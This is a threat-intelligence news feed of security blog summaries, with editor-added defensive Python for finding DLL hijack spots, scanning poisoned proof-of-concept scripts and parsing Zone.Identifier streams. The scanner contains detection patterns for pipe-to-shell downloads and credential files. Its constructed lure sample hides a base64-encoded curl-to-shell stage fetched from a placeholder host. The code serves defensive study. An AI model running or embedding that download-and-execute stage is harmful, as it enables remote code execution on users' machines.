28.9.24 | AI-driven insights for managing emerging threats and minimizing organizational risk

28.9.24 | Discover how to use the Cybersecurity Compass to foster effective conversations about cybersecurity strategy between non-technical and technical audiences, focusing on the phases of before, during, and after a breach.

28.9.24 | 2024 SonicWall Threat Brief: Healthcare’s Escalating Cybersecurity Challenge
SonicWall’s 2024 Healthcare Threat Brief reveals at least 14 million U.S. patients affected by malware breaches, as outdated systems leave healthcare providers vulnerable to evolving ransomware threats, underscoring the need for MSPs/MSSPs.

28.9.24 | Secure Access Unlocked: Exploring WNM 4.5 and Service Provider Monthly Program
Learn about exciting updates in WNM 4.5 plus new additions to our service provider program!

28.9.24 | Gleaming Pisces Poisoned Python Packages Campaign Delivers PondRAT Linux and MacOS Backdoors
Unit 42 researchers have been tracking the activity of an ongoing poisoned Python packages campaign delivering Linux and macOS backdoors via infected Python software packages. We’ve named these infected software packages PondRAT. We’ve also found Linux variants of POOLRAT, a known macOS remote administration tool (RAT) previously attributed to Gleaming Pisces (aka Citrine Sleet, distributor of AppleJeus). Based on our research into both RAT families, we assess that the new PondRAT is a lighter version of POOLRAT.

28.9.24 | We recently discovered a novel version of the RomCom malware family called SnipBot and, for the first time, show post-infection activity from the attacker on a victim system. This new strain makes use of new tricks and unique code obfuscation methods in addition to those seen in previous versions of RomCom 3.0 and PEAPOD (RomCom 4.0).

28.9.24 | Investigating Infrastructure and Tactics of Phishing-as-a-Service Platform Sniper Dz
We have been monitoring a widely popular phishing-as-a-service (PhaaS) platform named Sniper Dz that primarily targets popular social media platforms and online services. A large number of phishers could be using this platform to launch phishing attacks, since the group behind this kit has thousands of subscribers on its Telegram channel. Our research revealed over 140,000 phishing websites associated with the Sniper Dz PhaaS platform over the past year.

28.9.24 | Unit 42 researchers discovered two malware samples used by the Sparkling Pisces (aka Kimsuky) threat group. This includes an undocumented keylogger, called KLogEXE by its authors, and an undocumented variant of a backdoor dubbed FPSpy. These samples enhance Sparkling Pisces' already extensive arsenal and demonstrate the group’s continuous evolution and increasing capabilities.

28.9.24 | Check Point Research (CPR) uncovered a malicious app on Google Play designed to steal cryptocurrency, marking the first time a drainer has targeted mobile device users exclusively. The app used a set of evasion techniques to avoid detection and remained available for nearly five months before being removed.

28.9.24 | 10 Years of DLL Hijacking, and What We Can Do to Prevent 10 More
DLL Hijacking, a technique for forcing legitimate applications to run malicious code, has been in use for about a decade at least. In this write-up we give a short introduction to the technique of DLL Hijacking, followed by a digest of several dozen documented uses of that technique over the past decade, as documented by MITRE.
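The technique above turns on one fact: Windows probes a fixed sequence of directories for a DLL, and whichever copy is found first gets loaded. As an added example (not code from the write-up or from MITRE), the following Python script triages Procmon-style file-access events for loads that a standard user could hijack. It assumes a CSV export with Procmon's Process Name / Operation / Path / Result columns and a hypothetical list of user-writable directories; both the sample events and the directory list below are constructed, and the vendor directory is assumed to have been left writable by its installer.

```python
"""Triage Procmon-style file-access events for DLL search-order hijack candidates.

Heuristic: when a process probes for foo.dll in a directory a standard user can
write to, and that probe fails (NAME NOT FOUND) before the DLL is finally found
elsewhere, an attacker who drops foo.dll into that directory gets loaded instead
(search-order hijack). If the DLL is never found at all, it is a "phantom" DLL
and the first writable probe location wins outright.
"""
import csv
import io
import ntpath
from collections import defaultdict

# Constructed sample export in Procmon's CSV column layout (not a real capture).
SAMPLE_LOG = """\
Process Name,Operation,Path,Result
app.exe,CreateFile,C:\\Program Files\\Vendor\\app\\version.dll,NAME NOT FOUND
app.exe,CreateFile,C:\\Windows\\System32\\version.dll,SUCCESS
app.exe,CreateFile,C:\\Program Files\\Vendor\\app\\helper.dll,NAME NOT FOUND
app.exe,CreateFile,C:\\Windows\\System32\\helper.dll,NAME NOT FOUND
app.exe,CreateFile,C:\\Users\\alice\\AppData\\Local\\Temp\\helper.dll,NAME NOT FOUND
app.exe,CreateFile,C:\\Windows\\System32\\kernel32.dll,SUCCESS
app.exe,CreateFile,C:\\Program Files\\Vendor\\app\\config.ini,NAME NOT FOUND
"""

# Hypothetical set of directories a standard user can write to. In a real audit
# build this from icacls / Get-Acl output; the vendor directory is assumed here
# to have been left writable by its installer.
USER_WRITABLE = {
    r"C:\Users\alice\AppData\Local\Temp",
    r"C:\Program Files\Vendor\app",
}


def parse_events(log_text):
    """Return event dicts from a Procmon-style CSV export."""
    return list(csv.DictReader(io.StringIO(log_text)))


def hijack_candidates(log_text, writable_dirs):
    """Return one finding per (process, dll) whose load path can be hijacked."""
    writable = {d.lower() for d in writable_dirs}
    probes = defaultdict(list)  # (process, dll basename) -> ordered [(path, result)]
    for ev in parse_events(log_text):
        path = ev["Path"]
        if ev["Operation"] != "CreateFile" or not path.lower().endswith(".dll"):
            continue
        key = (ev["Process Name"], ntpath.basename(path).lower())
        probes[key].append((path, ev["Result"]))

    findings = []
    for (process, dll), sequence in probes.items():
        exposed = []      # failed probes in writable directories, in search order
        resolved = None   # where the legitimate DLL was eventually found, if ever
        for path, result in sequence:
            if result == "SUCCESS":
                resolved = path
                break         # later probes are irrelevant once the DLL loads
            if ntpath.dirname(path).lower() in writable:
                exposed.append(path)
        if exposed:
            findings.append({
                "process": process,
                "dll": dll,
                "kind": "phantom" if resolved is None else "search-order",
                "writable_probes": exposed,
                "resolved": resolved,
            })
    return findings


if __name__ == "__main__":
    for f in hijack_candidates(SAMPLE_LOG, USER_WRITABLE):
        legit = f" (legit copy: {f['resolved']})" if f["resolved"] else ""
        print(f"{f['process']} {f['dll']}: {f['kind']} hijack via {f['writable_probes'][0]}{legit}")
```

On the constructed data the script reports version.dll as a search-order hijack (the application directory is probed, and writable, before System32 supplies the real copy) and helper.dll as a phantom DLL that is never found anywhere, so any of its writable probe locations will do. kernel32.dll produces nothing because it loads on the first probe, and config.ini is ignored because only DLL probes matter to this check.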
28.9.24 | Simple Mail Transfer Pirates: How threat actors are abusing third-party infrastructure to send spam
Many spammers have elected to attack web pages and mail servers of legitimate organizations, so they may use these “pirated” resources to send unsolicited email.

28.9.24 | Cyberespionage the Gamaredon way: Analysis of toolset used to spy on Ukraine in 2022 and 2023
ESET Research has conducted a comprehensive technical analysis of Gamaredon’s toolset used to conduct its cyberespionage activities focused on Ukraine.

28.9.24 | Time to engage: How parents can help keep their children safe on Snapchat

21.9.24 | Cracked Software or Cyber Trap? The Rising Danger of AsyncRAT Malware
Authored by Neil Tyagi. In cybersecurity, threats constantly evolve, and new ways to exploit unsuspecting users are...

21.9.24 | How Ransomhub Ransomware Uses EDRKillShifter to Disable EDR and Antivirus Protections
Trend Micro tracks the group behind the RansomHub ransomware as Water Bakunawa; it employs various anti-EDR techniques to play a high-stakes game of hide and seek with security solutions.

21.9.24 | This is the third blog in an ongoing series on Rogue AI. Keep following for more technical guidance, case studies, and insights.

21.9.24 | Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China.

21.9.24 | Vulnerabilities in Cellular Packet Cores Part IV: Authentication
Our research reveals two significant vulnerabilities in Microsoft Azure Private 5G Core (AP5GC), both of which have now been resolved and are discussed in this blog post.

21.9.24 | The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-20017, assessed its impact and developed mitigation measures for the vulnerability. CVE-2024-20017 is a critical zero-click vulnerability with a CVSS 3.0 score

21.9.24 | Discovering Splinter: A First Look at a New Post-Exploitation Red Team Tool
This article discusses the discovery of a new post-exploitation red team tool called Splinter that we found on customer systems using Advanced WildFire’s memory scanning tools. Penetration testing toolkits and adversary simulation frameworks are often useful for identifying potential security issues in a company's network.

21.9.24 | FBI, CISA warning over false claims of hacked voter data – Week in security with Tony Anscombe
With just weeks to go before the US presidential election, the FBI and the CISA are warning about attempts to sow distrust in the electoral process.

21.9.24 | Influencing the influencers | Unlocked 403 cybersecurity podcast (ep. 6)

21.9.24 | In this blog, we will provide an overview of the Iranian threat landscape and discuss the tools, tactics and techniques used by these groups.

14.9.24 | Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities
In this blog entry, we provide an analysis of the recent remote code execution attacks related to Progress Software’s WhatsUp Gold that possibly abused the vulnerabilities CVE-2024-6670 and CVE-2024-6671.

14.9.24 | Earth Preta Evolves its Attacks with New Malware and Strategies
In this blog entry, we discuss our analysis of Earth Preta’s enhancements to its attacks: new tools, malware variants and strategies added to its worm-based attacks and its time-sensitive spear-phishing campaign.

14.9.24 | CUCKOO SPEAR Part 1: Analyzing NOOPDOOR from an IR Perspective
In this report, Cybereason confirms the ties between Cuckoo Spear and the APT10 intrusion set by tying multiple incidents together and disclosing new information about this group’s new arsenal and techniques.

14.9.24 | Unit 42 researchers recently found that Stately Taurus abused the popular Visual Studio Code software in espionage operations targeting government entities in Southeast Asia. Stately Taurus is a Chinese advanced persistent threat (APT) group that carries out cyberespionage attacks.

14.9.24 | Key Group Russian Ransomware Gang Uses Extensive Multi-purpose Telegram Channel
The SonicWall Capture Labs threat research team has recently been tracking ransomware known as Key Group. Key Group is a Russian-based malware threat group that was formed in early 2023.

14.9.24 | Hold – Verify – Execute: Rise of Malicious POCs Targeting Security Researchers
While investigating CVE-2024-5932, a code injection vulnerability in the GiveWP WordPress plugin, our team encountered a malicious Proof of Concept (POC) targeting cybersecurity professionals. Fake POCs are a growing threat to security professionals: threat actors use them to achieve their own ends, such as crypto mining, data exfiltration and backdoor installation.
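The "hold, verify" half of that advice is a step most people skip: read the PoC before running it, and in particular decode whatever it is hiding. As an added example (not code from the post or from its authors), the following Python scanner does that mechanically. It flags dangerous primitives, peels base64 layers, rescans what they decode to, and returns HOLD if anything dangerous turns up at any layer. The rule set is the editor's own heuristic list, not a published one, and the sample PoC below is constructed for the demo: it claims to be a GiveWP exploit but its real behaviour sits inside a base64 blob passed to exec(). The hostname example.invalid is a reserved placeholder, not an indicator.

```python
"""Static pre-flight check for a downloaded proof-of-concept before it is ever run.

A poisoned PoC usually keeps its real payload one layer down (base64 inside an
exec(), a blob fed to a shell), so scanning only the visible text is not enough:
every blob that decodes to text is rescanned with the same rules.
"""
import base64
import re

# Red-flag primitives (editor's heuristics). Any hit means: read it, don't run it.
PATTERNS = {
    "remote_fetch_pipe_shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"),
    "dynamic_exec": re.compile(r"\b(eval|exec)\s*\("),
    "shell_spawn": re.compile(r"\b(os\.system|subprocess\.(?:Popen|call|run|check_output))\s*\("),
    "persistence": re.compile(r"(crontab|/etc/cron|\.bashrc|systemctl\s+enable)"),
    "credential_access": re.compile(r"(\.ssh/|id_rsa|\.aws/credentials|\.bash_history)"),
}
# Long base64 runs are worth decoding and rescanning.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def triage(script, layer=0, max_layers=3):
    """Return findings as dicts {rule, layer, snippet}. Layer N+1 is the text a
    base64 blob found at layer N decodes to."""
    findings = []
    for rule, rx in PATTERNS.items():
        for m in rx.finditer(script):
            findings.append({"rule": rule, "layer": layer, "snippet": m.group(0)})
    if layer < max_layers:
        for blob in B64_BLOB.findall(script):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # not valid base64 text; still worth a manual look
            findings.append({"rule": "base64_layer", "layer": layer, "snippet": blob[:24] + "..."})
            findings.extend(triage(decoded, layer + 1, max_layers))
    return findings


def verdict(findings):
    """HOLD if anything dangerous was found at any layer, else PASS (still read it)."""
    return "HOLD" if any(f["rule"] != "base64_layer" for f in findings) else "PASS"


# Constructed sample: a script that claims to be a GiveWP exploit but whose real
# behaviour is an exec() of a base64 blob that downloads and pipes a stage-2 shell
# script. The blob is built here so the sample stays readable; a real lure would
# ship it pre-encoded.
_HIDDEN_STAGE = 'import os\nos.system("curl http://example.invalid/stage2.sh | sh")\n'
SAMPLE_POC = (
    "#!/usr/bin/env python3\n"
    "# PoC for CVE-2024-5932 (GiveWP) - usage: python3 poc.py <target>\n"
    "import sys, base64, requests\n"
    "target = sys.argv[1]\n"
    f'exec(base64.b64decode("{base64.b64encode(_HIDDEN_STAGE.encode()).decode()}"))\n'
    "print('[+] sending payload to', target)\n"
)


if __name__ == "__main__":
    found = triage(SAMPLE_POC)
    for f in found:
        print(f"layer {f['layer']}: {f['rule']:24s} {f['snippet']!r}")
    print("verdict:", verdict(found))
```

On the sample the visible layer only shows an exec() of a blob; the decoded layer shows the curl-pipe-to-shell download and the os.system() call, which is the behaviour that matters. Treat a PASS as "nothing obvious", not as safe: run anything you do decide to execute in a disposable VM, not on the workstation that holds your keys.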
14.9.24 | Microsoft’s September 2024 Patch Tuesday has 79 vulnerabilities, of which 30 are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2024 and has produced coverage for 9 of the reported vulnerabilities.

14.9.24 | Targeted Iranian Attacks Against Iraqi Government Infrastructure
Check Point Research discovered a new set of malware called Veaty and Spearal that was used in attacks against different Iraqi entities including government networks.

14.9.24 | DragonRank, a Chinese-speaking SEO manipulator service provider
Cisco Talos is disclosing a new threat called “DragonRank” that primarily targets countries in Asia and a few in Europe, operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation.

14.9.24 | Talos' Nick Biasini discusses the biggest shifts and trends in the threat landscape so far. We also focus on one state-sponsored actor that has been particularly active this year, and talk about why defenders need to be paying closer attention to infostealers.

14.9.24 | Vulnerability in Tencent WeChat custom browser could lead to remote code execution
While this issue was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported it to the vendor.

14.9.24 | Watch our new documentary, "The Light We Keep: A Project PowerUp Story"
The Light We Keep documentary tells the story of the consequences of electronic warfare in Ukraine and its effect on power grids across the country.

14.9.24 | A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America.

14.9.24 | CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges.

14.9.24 | September’s monthly round of patches from Microsoft included 79 vulnerabilities, seven of which are considered critical.

14.9.24 | The best and worst ways to get users to improve their account security
In my opinion, mandatory enrollment is best enrollment.

14.9.24 | Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads
The threat of VBA macros has diminished since Microsoft began blocking the execution of macros in Office documents downloaded from the internet, but not every user runs an up-to-date Office version, so many remain vulnerable.
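The block described above is not a property of the document itself: Office decides from the file's Mark of the Web, the Zone.Identifier alternate data stream that browsers and mail clients attach on download. As an added example (not code from the Talos post), here is a Python parser for that stream that reports whether the default macro block applies. The sample streams are constructed, their hostnames are placeholders, and the rule that ZoneId 3 and 4 trigger the block follows Microsoft's published description of the control; confirm it against the policy on your own Office build.

```python
"""Decide whether Office's default macro block applies to a file, from its
Mark-of-the-Web (the Zone.Identifier alternate data stream).

Office blocks VBA macros in a document carrying ZoneId 3 (Internet) or 4
(Restricted sites). ZoneId 0-2, or no stream at all, means this control does
not apply and only older controls (Protected View, trust settings) stand in
the way of the macro.
"""
import re

ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}
BLOCKED_ZONES = {3, 4}


def parse_zone_identifier(stream):
    """Parse the INI-style [ZoneTransfer] stream into a dict; None if no stream."""
    if stream is None:
        return None
    section = None
    fields = {}
    for raw in stream.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "zonetransfer" and "=" in line:
            key, _, value = line.partition("=")   # URLs may contain '=' themselves
            fields[key.strip()] = value.strip()
    if "ZoneId" not in fields or not re.fullmatch(r"\d+", fields["ZoneId"]):
        raise ValueError("Zone.Identifier stream has no valid ZoneId")
    fields["ZoneId"] = int(fields["ZoneId"])
    return fields


def macro_block_applies(stream):
    """Return (blocked, reason) for the given Zone.Identifier stream text."""
    info = parse_zone_identifier(stream)
    if info is None:
        return False, "no Zone.Identifier stream: file never received a Mark of the Web"
    zone = info["ZoneId"]
    name = ZONE_NAMES.get(zone, f"unknown zone {zone}")
    if zone in BLOCKED_ZONES:
        return True, f"ZoneId={zone} ({name}); origin {info.get('HostUrl', '?')}"
    return False, f"ZoneId={zone} ({name}): the internet macro block does not apply"


# Constructed sample streams, the text `Get-Content file.docm -Stream Zone.Identifier`
# would show on a Windows host. Hostnames are placeholders, not real indicators.
DOWNLOADED = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://mail.example.test/\r\n"
    "HostUrl=https://files.example.test/invoice.docm\r\n"
)
INTRANET = "[ZoneTransfer]\r\nZoneId=1\r\n"


if __name__ == "__main__":
    for label, stream in [("downloaded", DOWNLOADED), ("intranet", INTRANET), ("no stream", None)]:
        blocked, reason = macro_block_applies(stream)
        print(f"{label:10s} blocked={blocked}  {reason}")
```

The "no stream" branch is the one to watch in an investigation: a document pulled out of a container that does not propagate the mark arrives with no Zone.Identifier at all, so nothing tells Office it came from the internet, and the macro runs under whatever the older trust settings allow.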
14.9.24 | CosmicBeetle joins the ranks of RansomHub affiliates – Week in security with Tony Anscombe
ESET research also finds that CosmicBeetle attempts to exploit the notoriety of the LockBit ransomware gang to advance its own ends.

14.9.24 | CosmicBeetle, after improving its own ransomware, tries its luck as a RansomHub affiliate

11.9.24 | Fake recruiter coding tests target devs with malicious Python packages
RL found the VMConnect campaign continuing with malicious actors posing as recruiters, using packages and the names of financial firms to lure developers.

7.9.24 | Our research reveals that an unidentified threat cluster we named TIDRONE has shown significant interest in military-related industry chains, particularly in the manufacturers of drones.

7.9.24 | Banking Trojans: Mekotio Looks to Expand Targets, BBTok Abuses Utility Command
Notorious Mekotio and BBTok are having a resurgence targeting Latin American users. Mekotio’s latest variant suggests the gang behind it is broadening its targets, while BBTok is seen abusing MSBuild.exe to evade detection.

7.9.24 | Earth Lusca Uses KTLVdoor Backdoor for Multiplatform Intrusion
While monitoring Earth Lusca, we discovered the threat group’s use of KTLVdoor, a highly obfuscated multiplatform backdoor, as part of a large-scale attack campaign.

7.9.24 | CVE-2024-23119: Critical SQL Injection Vulnerability in Centreon
The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-23119, assessed its impact and developed mitigation measures for this vulnerability. CVE-2024-23119 is a high-severity SQL Injection vulnerability in Centreon, impacting Centreon

7.9.24 | Bitcoin ATM scams skyrocket – Week in security with Tony Anscombe
The schemes disproportionately victimize senior citizens, as those aged 60 or over were more than three times as likely as younger adults to fall prey to the scams.

7.9.24 | The key considerations for cyber insurance: A pragmatic approach

7.9.24 | Sometimes there’s more than just an enticing product offer hiding behind an ad

1.9.24 | North Korean threat actor Citrine Sleet exploiting Chromium zero-day
Microsoft identified a North Korean threat actor exploiting a zero-day vulnerability in Chromium, now identified as CVE-2024-7971, to gain remote code execution (RCE).